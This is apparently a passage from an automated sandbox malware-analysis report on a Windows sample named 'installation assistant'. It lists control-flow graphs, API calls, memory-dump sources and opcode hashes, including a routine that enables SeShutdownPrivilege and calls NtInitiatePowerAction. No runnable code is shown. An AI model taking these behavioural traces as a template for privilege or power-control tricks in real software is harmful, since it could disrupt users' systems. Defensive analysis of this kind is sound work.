                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ;T55
                                    • API String ID: 0-2572755013
                                    • Opcode ID: bbc34b7b8b0fceca03248c58e2d82e2266b789801f5732ae36f19d7c11e5d07f
                                    • Instruction ID: ee18af5822155518251048c6003d973cedd4cd4f51d62d321acf54e7c6291525
                                    • Opcode Fuzzy Hash: bbc34b7b8b0fceca03248c58e2d82e2266b789801f5732ae36f19d7c11e5d07f
                                    • Instruction Fuzzy Hash: 8E03E732645B018FC728CF28C8D0699B7E3AFD5324719CA6DC0A64B7A5DB78B54BCB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7579 6c164ff0-6c165077 CreateProcessA 7580 6c1650ca-6c1650d3 7579->7580 7581 6c1650d5-6c1650da 7580->7581 7582 6c1650f0-6c16510b 7580->7582 7583 6c165080-6c1650c2 WaitForSingleObject CloseHandle * 2 7581->7583 7584 6c1650dc-6c1650e1 7581->7584 7582->7580 7583->7580 7584->7580 7585 6c1650e3-6c165118 7584->7585
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID: D
                                    • API String ID: 963392458-2746444292
                                    • Opcode ID: 8d884013ad7deda68d265ab2aa2a5331267cb4aff5e24f31e8c492f82daf6ed1
                                    • Instruction ID: 223ae69208f10e97906ae1d5fc719e4d21a0be58b76a589e0f02083fe1f09ff6
                                    • Opcode Fuzzy Hash: 8d884013ad7deda68d265ab2aa2a5331267cb4aff5e24f31e8c492f82daf6ed1
                                    • Instruction Fuzzy Hash: 103102708093808FD740DF29C19872ABBF0EB9A318F509A1DF8D986251E7B8D598CF43

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7587 6c17bc5e-6c17bc7a 7588 6c17bc80-6c17bc82 7587->7588 7589 6c17be39 7587->7589 7590 6c17bca4-6c17bcc5 7588->7590 7591 6c17bc84-6c17bc97 call 6c16f9df call 6c16f9cc call 6c170120 7588->7591 7592 6c17be3b-6c17be3f 7589->7592 7593 6c17bcc7-6c17bcca 7590->7593 7594 6c17bccc-6c17bcd2 7590->7594 7609 6c17bc9c-6c17bc9f 7591->7609 7593->7594 7596 6c17bcd4-6c17bcd9 7593->7596 7594->7591 7594->7596 7598 6c17bcdb-6c17bce7 call 6c17ac69 7596->7598 7599 6c17bcea-6c17bcfb call 6c17be40 7596->7599 7598->7599 7607 6c17bcfd-6c17bcff 7599->7607 7608 6c17bd3c-6c17bd4e 7599->7608 7612 6c17bd26-6c17bd32 call 6c17beb1 7607->7612 7613 6c17bd01-6c17bd09 7607->7613 7610 6c17bd95-6c17bdb7 WriteFile 7608->7610 7611 6c17bd50-6c17bd59 7608->7611 7609->7592 7614 6c17bdc2 7610->7614 7615 6c17bdb9-6c17bdbf GetLastError 7610->7615 7617 6c17bd85-6c17bd93 call 6c17c2c3 7611->7617 7618 6c17bd5b-6c17bd5e 7611->7618 7621 6c17bd37-6c17bd3a 7612->7621 7619 6c17bd0f-6c17bd1c call 6c17c25b 7613->7619 7620 6c17bdcb-6c17bdce 7613->7620 7622 6c17bdc5-6c17bdca 7614->7622 7615->7614 7617->7621 7624 6c17bd75-6c17bd83 call 6c17c487 7618->7624 7625 6c17bd60-6c17bd63 7618->7625 7628 6c17bd1f-6c17bd21 7619->7628 7623 6c17bdd1-6c17bdd6 7620->7623 7621->7628 7622->7620 7629 6c17be34-6c17be37 7623->7629 7630 6c17bdd8-6c17bddd 7623->7630 7624->7621 7625->7623 7631 6c17bd65-6c17bd73 call 6c17c39e 7625->7631 7628->7622 7629->7592 7635 6c17bddf-6c17bde4 7630->7635 7636 6c17be09-6c17be15 7630->7636 7631->7621 7641 6c17bde6-6c17bdf8 call 6c16f9cc call 6c16f9df 7635->7641 7642 6c17bdfd-6c17be04 call 6c16f9f2 7635->7642 7639 6c17be17-6c17be1a 7636->7639 7640 6c17be1c-6c17be2f call 6c16f9cc call 6c16f9df 7636->7640 7639->7589 7639->7640 7640->7609 7641->7609 7642->7609
                                    APIs
                                      • Part of subcall function 6C17BEB1: GetConsoleCP.KERNEL32(?,6C17B0D0,?), ref: 6C17BEF9
                                    • WriteFile.KERNEL32(?,?,6C1846EC,00000000,00000000,?,00000000,00000000,6C185AB6,00000000,00000000,?,00000000,6C17B0D0,6C1846EC,00000000), ref: 6C17BDAF
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C1846EC,6C17B0D0,00000000,?,?,?,?,00000000,?), ref: 6C17BDB9
                                    • __dosmaperr.LIBCMT ref: 6C17BDFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                    • String ID: 8Q
                                    • API String ID: 251514795-4022487301
                                    • Opcode ID: 836a8accd3629a9c2e11626c356fc9129d45cd57d186f84e17e2445370729e5b
                                    • Instruction ID: 1ebc2c36a9feab0aab793b58196dfe649ed425043cde173813340403a5371c48
                                    • Opcode Fuzzy Hash: 836a8accd3629a9c2e11626c356fc9129d45cd57d186f84e17e2445370729e5b
                                    • Instruction Fuzzy Hash: C851F671A0520AAFDB21DFA9C880BEEBBB9EF0631CF150451E510ABA91DB349945C7B1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7654 6c165b90-6c165b9c 7655 6c165b9e-6c165ba9 7654->7655 7656 6c165bdd 7654->7656 7658 6c165bbf-6c165bcc call 6c0301f0 call 6c170b18 7655->7658 7659 6c165bab-6c165bbd 7655->7659 7657 6c165bdf-6c165c57 7656->7657 7660 6c165c83-6c165c89 7657->7660 7661 6c165c59-6c165c81 7657->7661 7667 6c165bd1-6c165bdb 7658->7667 7659->7658 7661->7660 7663 6c165c8a-6c165d49 call 6c032250 call 6c032340 call 6c169379 call 6c02e010 call 6c167088 7661->7663 7667->7657
                                    APIs
                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C165D31
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Ios_base_dtorstd::ios_base::_
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 323602529-1866435925
                                    • Opcode ID: 8ebbbe49d9a24212a7e6480042f818a5c4d886c957ae478d1df7a148976e14d9
                                    • Instruction ID: 20de6d37a9d1243ed9a3e722342e77bbe3a44a9d277a8031b73c604f7e9145f5
                                    • Opcode Fuzzy Hash: 8ebbbe49d9a24212a7e6480042f818a5c4d886c957ae478d1df7a148976e14d9
                                    • Instruction Fuzzy Hash: F95143B5900B008FD725CF2AC495BA7BBF1BB49318F108A2DD8864BB91D775B909CF90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7699 6c17b925-6c17b939 call 6c1815a2 7702 6c17b93f-6c17b947 7699->7702 7703 6c17b93b-6c17b93d 7699->7703 7705 6c17b952-6c17b955 7702->7705 7706 6c17b949-6c17b950 7702->7706 7704 6c17b98d-6c17b9ad call 6c18171f 7703->7704 7716 6c17b9af-6c17b9b9 call 6c16f9f2 7704->7716 7717 6c17b9bb 7704->7717 7709 6c17b957-6c17b95b 7705->7709 7710 6c17b973-6c17b983 call 6c1815a2 CloseHandle 7705->7710 7706->7705 7708 6c17b95d-6c17b971 call 6c1815a2 * 2 7706->7708 7708->7703 7708->7710 7709->7708 7709->7710 7710->7703 7719 6c17b985-6c17b98b GetLastError 7710->7719 7721 6c17b9bd-6c17b9c0 7716->7721 7717->7721 7719->7704
                                    APIs
                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,6C18425F), ref: 6C17B97B
                                    • GetLastError.KERNEL32(?,00000000,?,6C18425F), ref: 6C17B985
                                    • __dosmaperr.LIBCMT ref: 6C17B9B0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CloseErrorHandleLast__dosmaperr
                                    • String ID:
                                    • API String ID: 2583163307-0
                                    • Opcode ID: bca512c795c5c6ed2e752e31d0b8a8d042381cf14078d248fcfe7002c235385d
                                    • Instruction ID: 732dcfda0c3e489f338f28492dfddfaa7a4bdd812cfa71d9e9484cc162b09b32
                                    • Opcode Fuzzy Hash: bca512c795c5c6ed2e752e31d0b8a8d042381cf14078d248fcfe7002c235385d
                                    • Instruction Fuzzy Hash: 4D014E73A4A2205BC620063B9455BAE37654F93B3CF394359F83A87AC1DF60C8458270

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7944 6c170b9c-6c170ba7 7945 6c170bbe-6c170bcb 7944->7945 7946 6c170ba9-6c170bbc call 6c16f9cc call 6c170120 7944->7946 7948 6c170c06-6c170c0f call 6c17ae75 7945->7948 7949 6c170bcd-6c170be2 call 6c170cb9 call 6c17873e call 6c179c60 call 6c17b898 7945->7949 7957 6c170c10-6c170c12 7946->7957 7948->7957 7963 6c170be7-6c170bec 7949->7963 7964 6c170bf3-6c170bf7 7963->7964 7965 6c170bee-6c170bf1 7963->7965 7964->7948 7966 6c170bf9-6c170c05 call 6c1747bb 7964->7966 7965->7948 7966->7948
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8Q
                                    • API String ID: 0-4022487301
                                    • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                    • Instruction ID: 756154085fcb46bf4b76c9b748c0a207fe0a9a99fba3f3617cf1fbd40877a8c7
                                    • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                    • Instruction Fuzzy Hash: 1CF0FF72601B546AD6315A2A8C00BDB36A89F8337CF200755E87193ED0DB7AE40ACAB1
                                    APIs
                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C165AB4
                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C165AF4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Ios_base_dtorstd::ios_base::_
                                    • String ID:
                                    • API String ID: 323602529-0
                                    • Opcode ID: 6db1446b4cc222ba87748be623d3f9e03d9ce2316da49e6fd11e5f5b49a2c8e4
                                    • Instruction ID: 3d280b5fa56dbeedfc0dd684d336f4e47edb4d1976790f95b772a5966c28bcd4
                                    • Opcode Fuzzy Hash: 6db1446b4cc222ba87748be623d3f9e03d9ce2316da49e6fd11e5f5b49a2c8e4
                                    • Instruction Fuzzy Hash: FB513771201B00DBE725CF25C494BD6BBF4BB04718F448A1CD4AA5BB92DB30B559CB80
                                    APIs
                                    • GetLastError.KERNEL32(6C196DD8,0000000C), ref: 6C16EF52
                                    • ExitThread.KERNEL32 ref: 6C16EF59
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ErrorExitLastThread
                                    • String ID:
                                    • API String ID: 1611280651-0
                                    • Opcode ID: 783881b589b905f4b456caa3834b840845a9b96f9e2e209d806240b5d21d3c35
                                    • Instruction ID: b050ed80ac41f9acadecacc0924182a2e00dddac323c647f77459872eec60be3
                                    • Opcode Fuzzy Hash: 783881b589b905f4b456caa3834b840845a9b96f9e2e209d806240b5d21d3c35
                                    • Instruction Fuzzy Hash: 98F0C271A00604AFDF109FB1C819BAE3B74FF41318F244289E41597B50CF315A15DBE1
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __wsopen_s
                                    • String ID:
                                    • API String ID: 3347428461-0
                                    • Opcode ID: 4e455dfeca53e8af26f9324183289a3596062cc4e2178a9f9a19ca1127582398
                                    • Instruction ID: 732e4595d2d7bb620d0dd97d6beb1893857450c1644b7eb4a8a779d26253c9c0
                                    • Opcode Fuzzy Hash: 4e455dfeca53e8af26f9324183289a3596062cc4e2178a9f9a19ca1127582398
                                    • Instruction Fuzzy Hash: 84118871A0420EAFCF05CF59E945A9B3BF8EF49308F1440A9F808AB301D731E911CBA4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                    • Instruction ID: 866f6c938c73b8e7a7a6096360440289834597d2677122394c2111e2435c9ea6
                                    • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                    • Instruction Fuzzy Hash: 07012C72C05159AFCF019FA88D00AEF7FB9AB08214F144165FD24A26A0E7318A25DB91
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000000,?,6C184115,?,?,00000000,?,6C184115,00000000,0000000C), ref: 6C184474
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 1b0dce695742ffac9d3f70f3516ea9540bd436e00e219a2fe5d28a1bc9c96693
                                    • Instruction ID: 760800c77fc5c65a0de1362a7b03c5d59e07b11ad97598d16ac08f69b0696d44
                                    • Opcode Fuzzy Hash: 1b0dce695742ffac9d3f70f3516ea9540bd436e00e219a2fe5d28a1bc9c96693
                                    • Instruction Fuzzy Hash: E9D06C3210010DBBDF128E84DC06EDA3BAAFB88714F014000BA1856020C732E861AB90
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                    • Instruction ID: f3ed5f3b624bfd12e9bfda474507b040cbd9493895a2dde946e06f57bf2e75c8
                                    • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                    • Instruction Fuzzy Hash:
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: g)''
                                    • API String ID: 4218353326-3487984327
                                    • Opcode ID: dc5dec03836a5ec59de63eb6916ff9dd9bf8761d5ed52f4842726bbe44fb1635
                                    • Instruction ID: fe6d224e96fb66438acd93582a16996287c432f7b74a03270e31d2b629280b28
                                    • Opcode Fuzzy Hash: dc5dec03836a5ec59de63eb6916ff9dd9bf8761d5ed52f4842726bbe44fb1635
                                    • Instruction Fuzzy Hash: D6632231645B018FC728CF29C8D0A95B3F3AF9531876ACA6DC0E64BE55E778B45ACB40
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 6C165D6A
                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C165D76
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C165D84
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C165DAB
                                    • NtInitiatePowerAction.NTDLL ref: 6C165DBF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3256374457-3733053543
                                    • Opcode ID: 4aabe5a6a3f377fa839dfe36519f7a04ca6eed7f452eb2fd9b74b609a579c39a
                                    • Instruction ID: f3b4b8faf57d9d5920e246f192a193f7ae474e3dfe77532a23301e46993eefec
                                    • Opcode Fuzzy Hash: 4aabe5a6a3f377fa839dfe36519f7a04ca6eed7f452eb2fd9b74b609a579c39a
                                    • Instruction Fuzzy Hash: 29F0B470644300BBEA00AB24DD0EB6A7BB4EF56701F018608FD85A60D1D7B06984CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \j`7$\j`7$j
                                    • API String ID: 0-3644614255
                                    • Opcode ID: f223a2cb81013bcf15c1b1260bfee8c47f355c4d636f657ceff5dde74cfa231f
                                    • Instruction ID: 15b2acef885069d1b82d72cdad807c88136398c674c0f06c99384e5cf3cc0ce4
                                    • Opcode Fuzzy Hash: f223a2cb81013bcf15c1b1260bfee8c47f355c4d636f657ceff5dde74cfa231f
                                    • Instruction Fuzzy Hash: 08422476608382AFCB24CF69C48066EBBE1BBC9354F14495EE495CB360D339D946CB63
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1C6CE5
                                      • Part of subcall function 6C19CC2A: __EH_prolog.LIBCMT ref: 6C19CC2F
                                      • Part of subcall function 6C19E6A6: __EH_prolog.LIBCMT ref: 6C19E6AB
                                      • Part of subcall function 6C1C6A0E: __EH_prolog.LIBCMT ref: 6C1C6A13
